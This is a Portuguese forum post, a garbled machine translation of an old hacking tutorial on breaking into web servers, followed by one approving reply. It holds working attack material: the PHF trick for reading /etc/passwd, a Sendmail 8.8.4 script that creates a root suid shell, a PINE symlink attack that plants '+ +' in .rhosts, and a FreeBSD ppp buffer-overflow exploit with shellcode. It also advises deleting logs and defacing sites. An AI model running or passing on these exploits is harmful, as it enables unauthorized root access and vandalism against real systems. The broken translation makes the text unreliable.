Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[AVANÇADO]Invadindo Páginas da web

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial [AVANÇADO]Invadindo Páginas da web

    [I]Hacking Páginas Web
    The Ultimate Guide
    Por Circuito Virtual e Psychotic/Traduzido por LinkOff

    Bem Psychotic escreveu um dos mais úteis arquivos de texto unix no ciberespaço, mas wi
    ª e-mail que nós recebemos depois do lançamento do nosso famoso 36 página Unix Bíblia w
    e percebi que unix não é para todos por isso decidimos que deveríamos escrever em um
    outro aspecto de hackers ..... Circuito Virtual e Psychotic se orgulha de lançar ",
    Hacking Páginas Web Com algumas outras técnicas. "Vamos discutir uma vária maneira que poucos
    s de cortar páginas e ficando raiz. Também vamos entrevistar e busca
    íon outros hackers de verdade sobre os assuntos.

    Obtendo a senha do arquivo por meio de FTP

    Ok bem uma das maneiras mais fáceis de obter acesso de superusuário é através anônimo
    acesso ftp em uma página web. Primeiro você precisa aprender um pouco sobre o arquivo de senhas.
    ..

    root:User:d7Bdg:1n2HG2:1127:20:Superuser
    TomJones5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
    BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

    Este é um exemplo de um arquivo de senha criptografada regular. O superusuário é o par
    t que lhe dá origem. Essa é a parte principal do arquivo.

    root:x:0:1:Superuser:/:
    ftp:x:202:102:Anonymous ftp:/u1/ftp:
    ftpadmin:x:203:102:ftp Administrator:/u1/ftp

    Este é outro exemplo de um arquivo de senha, só que este tem um pouco diferente
    ce, é sombreada. Arquivos de senhas sombreadas não deixam você ver ou copiar o real
    senha criptografada. Isso causa problemas para o cracker de senha e dicionário
    * máquina (ambos explicado mais adiante no texto). Abaixo está um exemplo de um sombreado
    arquivo de senhas:

    root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:
    sys:x:3:3:0000-Admin(0000):/:
    adm:x:4:4:0000-Admin(0000):/var/adm:
    lp:x:71:8:0000-lp(0000):/usr/spool/lp:
    smtp:x:0:0:mail daemon user:/:
    uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
    nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
    listen:x:37:4:Network Admin:/usr/net/nls:
    nobody:x:60001:60001:uid no body:/:
    noaccess:x:60002:60002:uid no access:/:
    webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
    pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/
    false
    ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

    Arquivos de senhas sombreadas tem um "x" no lugar de uma senha ou às vezes eles
    são disfarçados como um * também.

    Agora que você sabe um pouco mais sobre o que o arquivo de senha real parece yo
    u deve ser capaz de identificar um normal de pw criptografado a partir de um arquivo de sombras pw . Nós ca
    n agora passam a falar sobre como quebrá-la .

    Rachando um arquivo de senha não é tão complicado quanto parece , embora o arquivo
    s variar de sistema para sistema. 1.O primeiro passo que você deve tomar é fazer o download
    *ou copiar o arquivo . 2 . O segundo passo é encontrar um cracker de senha e uma dicção
    ary fabricante . Embora seja quase impossível encontrar um bom biscoito há alguns
    *queridos ok lá fora . Eu recomendo que você procure por Cracker Jack, John the Ripper , B
    rute Força Cracker , ou Jack , o Estripador. Agora, para um fabricante de dicionário ou uma dictionar
    y arquivo ... Quando você inicia um prog rachaduras , você será solicitado para encontrar o do passw
    arquivo ord . É aí que um gerador de palavras aparece, você pode baixar um nea
    rly cada página de hackers na rede. A fabricante de dicionário encontra tudo o possível lett
    combinações er com o alfabeto que você escolher (ASCII , bonés, minúsculas, e num
    eric letras também podem ser adicionados ) . Estaremos lançando nosso arquivo pasword ao p
    ublic em breve, ele será chamado , Candy Psicótico ", a droga perfeita . " Tanto quanto nós
    sei que vai ser um dos maiores em circulação. 3 . Você, então, iniciar o crack
    er e siga as instruções que ele lhe dá .

    A técnica PHF

    Bem, eu não tinha certeza se eu deveria incluir nesta seção, devido ao fato de que everybod
    y já sabe que a maioria dos servidores e já descobriu sobre o erro e fixe
    d -o . Mas desde que eu tenha sido feitas perguntas sobre o phf decidi incluí-lo
    .

    A técnica phf é de longe a maneira mais fácil de obter um arquivo de senha (embora i
    t não funciona de 95% do tempo ) . Mas para fazer o phf tudo que você faz é abrir um navegador de um
    ª digitar o seguinte link:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... % 0a/bin/cat % 20/etc/passwd

    Você substitui o webpage_goes_here com o domínio. Portanto, se você estava tentando fazer com que t
    ele apresentar pw para Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... você deverá digitar:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... % 0a/bin/cat % 20/etc/passwd

    e é isso! Você é só sentar e copiar o arquivo (se ele funciona).

    Telnet e Exploits

    Bem façanhas são a melhor maneira de hackear webpages , mas eles também são mais complic
    ated então cortar através de FTP ou usando o PHF . Antes que você pode configurar um exploit y
    UO deve primeiro ter uma proggie telnet , existem muitos clientes diferentes que você pode jus
    t fazer uma netsearch e encontrar tudo que você precisa.
    O seu melhor para obter uma conta com o seu alvo (se possível) e visualizar as falhas f
    rom dentro para fora. Exploits expor erros ou bugs nos sistemas e normalmente permitem y
    UO para ganhar acesso root. Existem muitos exploits diferentes ao redor e você pode ver
    *cada separadamente. Eu estou indo para listar alguns abaixo, mas a lista de exploits é endle
    ss .

    Esta exploração é conhecido como Sendmail v.8.8.4
    Ele cria um programa / tmp / x suid que chama shell como root. Isto é como você configurá-lo
    *up:

    cat << _EOF_ >/tmp/x.c
    #define RUN "/bin/ksh"
    #include<stdio.h>
    main()
    {
    execl(RUN,RUN,NULL);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/spawnfish.c
    main()
    {
    execl("/usr/lib/sendmail","/tmp/smtpd",0);
    }
    _EOF_
    #
    cat << _EOF_ >/tmp/smtpd.c
    main()
    {
    setuid(0); setgid(0);
    system("chown root /tmp/x ;chmod 4755 /tmp/x");
    }
    _EOF_
    #
    #
    gcc -O -o /tmp/x /tmp/x.c
    gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
    gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
    #
    /tmp/spawnfish
    kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
    -f1`
    rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
    sleep 5
    if [ -u /tmp/x ] ; then
    echo "leet..."
    /tmp/x
    fi

    e agora para outra façanha. Im indo para exibir o pinheiro explorar através Linux. Ao observar a tabela de processos com ps para ver o que os usuários estão executando PINE, em
    e pode, então, fazer um ls em / tmp / para reunir os nomes lockfile para cada usuário. Assistindo
    g mesa o processo mais uma vez vai agora revelar quando cada usuário sair PINE ou corridas
    de mensagens não lidas na sua caixa de entrada, apagando efetivamente
    ** o respectivo ficheiro de bloqueio.

    ** Criando um link simbólico de / tmp / .hamors_lockfile para ~ hamors / .rhosts (para uma ge
    Neric exemplo) fará com que PINE para criar ~ hamors / .rhosts como um arquivo de 666 com PINE '
    id s processo como seu conteúdo. Pode-se agora simplesmente fazer um echo "+ +"> / tmp / .hamors
    _lockfile, então rm / tmp / .hamors_lockfile.

    Isto foi escrito por Sean B. HamorFor Neste exemplo, hamors é a vítima, enquanto gato
    luvr é o atacante:

    hamors (21 19:04) litterbox:~> pine

    catluvr (6 19:06) litterbox:~> ps -aux | grep pine
    catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
    hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

    catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
    - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4

    catluvr (8 19:07) litterbox:~> ps -aux | grep pine
    catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine

    catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

    hamors (23 19:09) litterbox:~> pine

    catluvr (11 19:10) litterbox:~> ps -aux | grep pine
    catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
    hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

    catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

    catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
    + +

    catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

    catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

    agora sobre a outra, esta será a última que eu estou indo para mostrar. exploração
    roteiro ção para o vulnerbility ppp como descrito por ninguém até à data, este não é
    FreeBSD-SA-96: 15. Funciona em
    ** FreeBSD como testado. Confusão com os números se ele não funciona. Isto é como você define
    * lo:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    #define BUFFER_SIZE 156 /* size of the bufer to overflow */

    #define OFFSET -290 /* number of bytes to jump after the start
    of the buffer */

    long get_esp(void) { __asm__("movl %esp,%eax\n"); }

    main(int argc, char *argv[])
    {
    char *buf = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    char execshell[] =
    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\ x07\x89\x56\x0f" /* 16
    bytes */
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\ x0b\x89\xca\x52" /* 16
    bytes */
    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20
    bytes */
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\ x04\x07\x04"; /* 15
    bytes, 57 total */

    int i,j;

    buf = malloc(4096);

    /* fill start of bufer with nops */

    i = BUFFER_SIZE-strlen(execshell);

    memset(buf, 0x90, i);
    ptr = buf + i;

    /* place exploit code into the buffer */

    for(i = 0; i < strlen(execshell); i++)
    *ptr++ = execshell;

    addr_ptr = (long *)ptr;
    for(i=0;i < (104/4); i++)
    *addr_ptr++ = get_esp() + OFFSET;

    ptr = (char *)addr_ptr;
    *ptr = 0;

    setenv("HOME", buf, 1);

    execl("/usr/sbin/ppp", "ppp", NULL);
    }

    Agora que você obteve raiz "o que é o próximo?" Bem, a escolha é até você, mas eu wou
    ld recomendar a alteração da senha antes de apagar ou alterar qualquer coisa. para chang
    e sua senha de tudo que você tem a fazer é entrar via telnet e faça o login com o seu novo uma
    cCount. Então você digita apenas: passwd e ele irá pedir para os abetos senha antiga
    t seguido por um novo. Agora só você vai ter o novo pw e que deve durar
    * por um tempo, agora você pode enviar-lhe as páginas, exclua todos os registros e simplesmente fazer
    seu worstJ Psychotic escreve nossas próprias façanhas e estaremos liberando-os em breve,
    * de modo a manter os olhos abertos para eles. Recomendamos que, se você é sério sobre lear
    ção pirataria étnica que você baixar a nossa Bíblia Unix.

    ~ ~ ~ ~ PSYCHOTIC/Traduzido por LinkOff

  • Font Size
    #2
    Cara isso ficou muito bom. Parabens.

    Comment

    X
    Working...
    X